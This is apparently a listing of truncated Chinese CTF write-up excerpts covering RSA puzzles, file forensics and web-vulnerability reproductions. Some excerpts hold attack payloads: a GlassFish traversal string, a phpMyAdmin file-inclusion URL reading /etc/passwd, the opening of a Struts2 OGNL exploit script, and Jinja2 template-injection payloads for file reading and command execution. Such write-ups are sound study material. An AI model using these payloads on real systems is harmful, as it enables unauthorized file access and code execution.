题目下载 给了两个文件。 第一个enc： p = 177077389675257695042507998165006460849 n = 37421829509887796274897162249367329400988647145613325367337968063341372726061 c = ==gMzYDNzIjMxUTNyIzNzIjMyYTM4MDM0gTMwEjNzgTM2UTN4cjNwIjN2QzM5ADMwIDNyMTO4…

题目下载 打开文件发现里面有一堆数字，仔细观察发现只有：63，127，191，255 和今年的西湖论剑预选赛的题有点像，考了TTL，参考： 标签: CTF - CodingBox技术博客 不难发现TTL值只有 63，127，191，255 四种，都是2的某次幂−1的值。于是将这四个数都转换成…

什么是GlassFish？ glassfish是一款java编写的跨平台的开源的应用服务器。漏洞原理？ java语言中会把%c0%ae解析为\uC0AE，最后转义为ASCCII字符的.（点）。利用%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/来向上跳转，达到目录穿越、任意文件读取的效果。Paylo…

这道题还是不太难的嘿qwq记录一哈： 仔细观察url的img的参数，复制下来，两遍base64，一遍hex可以得到明文。 同理，我们将参数改为?img=TmprMlJUWTBOalUzT0RKRk56QTJPRGN3&cmd=（一次hex两次base64），然后查看源代码，可以得到index的源码。

哈哈，打开给👵逗乐了。 查看源代码，发现check.php：

#!/usr/bin/python # -*- coding: utf-8 -*- import urllib2 import httplib def exploit(url, cmd): payload = "%{(#_='multipart/form-data')." payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." payload += "(#_memberAccess?" payload += "…

题目下载 这个挺坑的。放到010editor里挨个试出来是EBCDIC。害。 得到密码：wllm_is_the_best_team!打开压缩包，是一堆小人。之前有接触过跳舞的小人密码。 有两种？密码表，这道题是第二种： 对照得： iloveholmesandwllm

Mini_httpd是一个微型的Http服务器，在占用系统资源较小的情况下可以保持一定程度的性能（约为Apache的90%），因此广泛被各类IOT（路由器，交换器，摄像头等）作为嵌入式服务器。而包括华为，zyxel，海康威视，树莓派等在内的厂商的旗下设备都曾采用Mini_htt…

ThinkPHP 2.x版本中，使用preg_replace的/e模式匹配路由： $res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths)); 导致用户的输入参数被插入双引号中执行，造成任意代码执行漏洞。ThinkPHP 3.0版本因…

phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑，通过二次编码即可绕过检查，造成远程文件包含漏洞。 payload: http://your-ip:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd 可见…

漏洞名称：Tomcat任意文件上传漏洞 漏洞编号：CVE-2017-12615 漏洞影响：上传包含任意代码的文件，并被服务器执行。 影响平台：Windows 影响版本：Apache Tomcat 7.0.0 - 7.0.812017年9月19日，Apache Tomcat官方确认并修复了两个高危漏洞，漏洞CVE编号:CVE-…

ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中，获取method的方法中没有正确处理方法名，导致攻击者可以调用Request类任意方法并构造利用链，从而导致远程代码执行漏洞。 漏洞复现： 利用hackbar或bp发送数据包如下，即可成功执行id命令： POS…

import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/<path:shrine>') def shrine(shrine): def safe_jinja(s): s = s.replace('(', '').r</path:shrine>…

<h1>".file_get_contents($text,'r')."</h1></br>"; if(preg_match("/flag/",$file)){ echo "Not now!"; exit(); }else{ include($file); //u…

怎么办，已经截获了密文和模数n！能够破解吗？请分解出RSA中的两个大素数q和p。提交格式是key{x}x为两个素数中较小的那个的MD5前8位。 题目下载 他让求的是p和q，200个密文里可能会有和n相同的质数q， 所以大概意思就是让密文分别和N求最大公约数 n = 135176…

题目下载 第一步利用openssl把n和e求出来： 可以发现n不算太大，丢到大数分解网站里可以得到： p：184333227921154992916659782580114145999 q：336771668019607304680919844592337860739 到这里常规解就会报错了，参考了下大佬的wp： 同时看encrypt函数，可…

N is 186743751083130949285851565811389413685700222221909454612844026732040180753540698271860858513098065923987216288453368405327795791973029849876615472454231807609580228985464965242492016795434211588421034964528619321831443433159251061543…

题目下载 开局四个文件，分别来看一下嘛。 myflag1 R3Noy6r3WLItytAmb4FmHEygoilucEEZbO9ZYXx5JN03HNpBLDx7fXd2fl+UL5+11RCs/y0qlTGURWWDtG66eNLzGwNpAKiVj6I7RtUJl2Pcm3NvFeAFwI9UsVREyh7zIV6sI9ZP8l/2GVDorLAz5ULW+f0OINGhJmZm8FL/aDnlfTElhQ87LPicWpXYoMt…

p+q : 0x1232fecb92adead91613e7d9ae5e36fe6bb765317d6ed38ad890b4073539a6231a6620584cea5730b5af83a3e80cf30141282c97be4400e33307573af6b25e2ea (p+1)(q+1) : 0x5248becef1d925d45705a7302700d6a0ffe5877fddf9451a9c1181c4d82365806085fd86fbaab08b6fc66a…

查看源代码，到payflag页面，这里有个提示： Flag need your 100000000 moneyattentionIf you want to buy the FLAG: You must be a student from CUIT!!! You must be answer the correct password!!! 查了下CUIT是阿根廷的意思，我把Accept-Language改成了…

在/action.php这里抓包可以发现有一个secr3t.php 打开之后进行代码审计： 首先我直接?file=flag.php了一下，页…

题目下载 strings/binwalk/file都试过啦。。没有什么发现 看wp才晓得的蜜汁规律。。需要和0x33异或： data = open("photo.dat",'rb') strs = data.read() flag = open("flag.jpg",'ab+') for i in strs: flag.write(bytes([i ^ 0x33])) 得到一张图片： 接下…

在源代码这里发现了好玩的： 点进去瞅一下哈： 根据提示，改一下Referer，改一下UA，改一下XFF就出来了，意外的简单。 因为最近忙好久没更新博客了，也算记录一下。

先注册，然后登录了，提示admin账号才给flag： 查看源码发现action.php?callback=getInfo 这个页面存在当前用户的csrftoken 御剑扫到了可疑的东西： 访问test.php得到E5xqqsvHoznsjlfDm5ryLg== 访问action.php?callback=getInfo，抓包把username改为E5xqqsvH…

学习： 从 flask+jinjia2 认识 SSTI 服务端模板注入 | AbelChe's Blog Tokyo Westerns CTF 2018 WEB Wp | 码农网 题目里只给出了一个源代码： import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route(…

[1] {{1+1}}测试，存在模板注入： [2] {{config.items()}} 可以查看服务器的配置信息： [3] 读取password信息： {{[].__class__.__base__.__subclasses__()[40]('/etc/passwd').read()}} [4] 命令执行，（ls列出文件）： {% for c in [].__class__.__base__.…

记笔记，对区块链不是很了解，还是萌萌qwq。 学习参考：区块链与51%算力攻击&2018-DDCTF-mini blockchain 51% （双花）攻击： 在比特币网络里，你有多少钱，不是你说了算，而是大家说了算，每个人都是公证人。”基于算力证明进行维护的比特币网络一直以来有一…

破译下面的密文： TW5650Y - 0TS UZ50S S0V LZW UZ50WKW 9505KL4G 1X WVMUSL510 S001M0UWV 910VSG S0 WFLW0K510 1X LZW54 WF5KL50Y 2S4L0W4KZ52 L1 50U14214SLW X5L0WKK S0V TSK7WLTS88 VWNW8129W0L 50 W8W9W0LS4G, 95VV8W S0V Z5YZ KUZ118K SU41KK UZ50S.LZ…

foremost文件提取后有一个zip，把后缀改成apk。 JADX下载 详细过程参考这篇教程解压后选择lib/jadx-gui-1.0.0.jar，把文件拖入即可看到flag。

题目描述：Tornado 框架 /flag.txt flag in /fllllllllllllag /welcome.txt render /hints.txt md5(cookie_secret+md5(filename))根据题目描述可知使用了tornoda框架，进去后根据提示信息render和需要cookie_secret猜测会存在注入，把签名随便改一下就会跳转…